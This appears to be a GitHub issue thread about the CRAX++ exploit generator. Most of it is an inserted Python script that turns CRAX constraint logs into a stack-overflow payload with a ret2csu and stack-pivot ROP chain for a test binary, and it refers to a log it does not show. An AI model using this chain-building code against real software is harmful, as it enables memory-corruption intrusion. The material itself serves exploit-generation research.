bootstrap.sh      project.json             s2e-out-17  s2e-out-29
bootstrap.sh.old  s2e-config.lua           s2e-out-18  s2e-out-3
exploit_0.py      s2e-config.template.lua  s2e-out-19  s2e-out-4
guest-tools32     s2e-last                 s2e-out-2   s2e-out-5
guest-tools64     s2e-out-0                s2e-out-20  s2e-out-6
guestfs           s2e-out-1                s2e-out-21  s2e-out-7
launch-crax.sh    s2e-out-10               s2e-out-22  s2e-out-8
launch-s2e.sh     s2e-out-11               s2e-out-23  s2e-out-9
ld-2.24.so        s2e-out-12               s2e-out-24  serial.txt
libc-2.24.so      s2e-out-13               s2e-out-25  set-target.sh
library.lua       s2e-out-14               s2e-out-26  sym_stdin
models.lua        s2e-out-15               s2e-out-27  target
poc               s2e-out-16               s2e-out-28
$
[*] Interrupted
[*] Stopped process './ld-2.24.so' (pid 743870)

Here are the techniques I used. (Edit s2e-config.template.lua)

    -- The exploitation techniques that your exploit will use
    techniques = {
        "Ret2csu",
        "BasicStackPivoting",
        "Ret2syscall",
    },
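The "Constraining ... (concretized=...)" lines CRAX printed in the successful run above are a complete description of the stack it wants, so they can be turned back into bytes and inspected without re-running S2E. The following is an added example, not exploit_0.py and not code from CRAX++: it parses those lines (copied verbatim from the log into a constructed sample string), serializes the constrained qwords into a chain, and lays out the full stdin buffer. The read buffer address (0x7ffd139c6a90, from the `syscall: 0x0 (0x0, 0x7ffd139c6a90, 0x400, ...)` line) and RSP (0x7ffd139c6ac0, from the register dump) are read off the log; the assumption that saved RBP and the return address occupy the two qwords just below RSP (a leave; ret epilogue, consistent with the original RIP 0x4011cd sitting right after target_leave_ret 0x4011cc) is mine, as are all function names.

```python
import re
import struct

# Constructed sample: the constraint lines from the CRAX log above, copied verbatim
# (register constraints first, then the stack qwords in the order CRAX printed them).
SAMPLE_LOG = """\
16 [State 0] CRAX: Constraining RBP to p64(0x0) (concretized=0x0)
16 [State 0] CRAX: Constraining RIP to p64(target_base + __libc_csu_init_gadget1) (concretized=0x401226)
16 [State 0] CRAX: Constraining 0x7ffd139c6ac0 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6ac8 to p64(0x0) (concretized=0x0)
16 [State 0] CRAX: Constraining 0x7ffd139c6ad0 to p64(0x1) (concretized=0x1)
16 [State 0] CRAX: Constraining 0x7ffd139c6ad8 to p64(0x0) (concretized=0x0)
16 [State 0] CRAX: Constraining 0x7ffd139c6ae0 to p64(target_base + pivot_dest) (concretized=0x404840)
16 [State 0] CRAX: Constraining 0x7ffd139c6ae8 to p64(0x400) (concretized=0x400)
16 [State 0] CRAX: Constraining 0x7ffd139c6af0 to p64(target_base + __libc_csu_init_call_target) (concretized=0x402e48)
16 [State 0] CRAX: Constraining 0x7ffd139c6af8 to p64(target_base + __libc_csu_init_gadget2) (concretized=0x401210)
16 [State 0] CRAX: Constraining 0x7ffd139c6b00 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b08 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b10 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b18 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b20 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b28 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b30 to p64(0x4141414141414141) (concretized=0x4141414141414141)
17 [State 0] CRAX: Constraining 0x7ffd139c6b38 to p64(target_base + target.sym['read']) (concretized=0x401070)
17 [State 0] CRAX: Constraining 0x7ffd139c6b40 to p64(target_base + target_pop_rbp_ret) (concretized=0x40115d)
17 [State 0] CRAX: Constraining 0x7ffd139c6b48 to p64(target_base + pivot_dest) (concretized=0x404840)
17 [State 0] CRAX: Constraining 0x7ffd139c6b50 to p64(target_base + target_leave_ret) (concretized=0x4011cc)
"""

# Read off the log above: the buffer the overflowing read() filled, and RSP at the
# moment the symbolic RIP was detected.
READ_BUF = 0x7FFD139C6A90    # syscall: 0x0 (0x0, 0x7ffd139c6a90, 0x400, ...)
RSP_AT_RET = 0x7FFD139C6AC0  # RSP in the register dump
FILLER = 0x4141414141414141

CONSTRAINT_RE = re.compile(
    r"Constraining (?P<where>RIP|RBP|0x[0-9a-f]+) to p64\((?P<expr>[^)]*)\)"
    r" \(concretized=(?P<val>0x[0-9a-f]+)\)"
)

def p64(v):
    return struct.pack("<Q", v)

def parse_constraints(log):
    """Split CRAX's constraint lines into register constraints ({'RIP': (expr, val)})
    and memory constraints ([(addr, expr, val)] sorted by address)."""
    regs, mem = {}, []
    for line in log.splitlines():
        m = CONSTRAINT_RE.search(line)
        if not m:
            continue
        val = int(m.group("val"), 16)
        if m.group("where") in ("RIP", "RBP"):
            regs[m.group("where")] = (m.group("expr"), val)
        else:
            mem.append((int(m.group("where"), 16), m.group("expr"), val))
    mem.sort()
    return regs, mem

def is_contiguous(mem, base):
    """True when the constrained qwords form one gap-free run starting at base."""
    return all(addr == base + 8 * i for i, (addr, _, _) in enumerate(mem))

def build_chain(mem, rsp):
    """Serialize the constrained stack qwords, lowest address first. A hole (e.g. a
    line dropped while copying the log) would shift every later gadget, so refuse it."""
    if not is_contiguous(mem, rsp):
        raise ValueError("memory constraints are not a contiguous run from RSP")
    return b"".join(p64(val) for _, _, val in mem)

def build_stdin(regs, mem, read_buf, rsp):
    """Full stdin payload. Assumption (mine): the overflowed function returned via
    leave; ret, so saved RBP is at rsp-16 and the return address at rsp-8."""
    pad = rsp - 16 - read_buf
    if pad < 0:
        raise ValueError("RSP is below the read buffer; frame assumption does not hold")
    return b"A" * pad + p64(regs["RBP"][1]) + p64(regs["RIP"][1]) + build_chain(mem, rsp)

def offset_of(mem, rsp, needle):
    """Offset from RSP of the first qword whose symbolic expression contains needle."""
    for addr, expr, _ in mem:
        if needle in expr:
            return addr - rsp
    raise KeyError(needle)

def describe(mem, rsp):
    """[(offset, expr)] for the non-filler qwords, to eyeball the chain layout."""
    return [(addr - rsp, expr) for addr, expr, val in mem if val != FILLER]

if __name__ == "__main__":
    regs, mem = parse_constraints(SAMPLE_LOG)
    for off, expr in describe(mem, RSP_AT_RET):
        print(f"rsp+{off:#04x}: {expr}")
    payload = build_stdin(regs, mem, READ_BUF, RSP_AT_RET)
    print(f"{len(payload)} bytes (the read() above accepts 0x400)")
```

The describe() output makes visible what the technique names already indicate: the qwords between __libc_csu_init_gadget1 and the return into gadget2 stage pivot_dest, 0x400 and the call target, and the tail of the chain is read, pop rbp; ret, pivot_dest, leave; ret, i.e. a read into pivot_dest followed by a pivot of RSP there. The contiguity check is the part worth keeping: a missed line while copying a constraint dump shifts every later gadget by eight bytes and fails silently otherwise.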

@aesophor Thank you a lot for your response! I have also confirmed that it works perfectly now.

I'll close the issue.